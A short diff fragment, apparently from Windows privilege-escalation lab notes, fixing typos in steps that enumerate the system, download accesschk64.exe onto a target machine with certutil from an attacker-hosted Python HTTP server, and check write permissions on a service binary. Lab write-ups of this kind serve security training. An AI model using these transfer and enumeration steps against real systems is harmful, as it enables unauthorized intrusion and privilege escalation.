Skip to content

 systeminfo | findstr /B /C:"System Type"

-2. Host the binary using Pythong HTTP server and transfer it to the target Machine with certutil.
+2. Host the binary with a Python HTTP server and transfer it:

-certutil -urlcache -f http://[IP-ADRESS]:8000/accesschk64.exe accesschk64.exe
+certutil -urlcache -f http://[IP-ADDRESS]:8000/accesschk64.exe accesschk64.exe

 .\accesschk64.exe -wvu "C:\Program Files\File Permissions Service\filepermservice.exe" -accepteula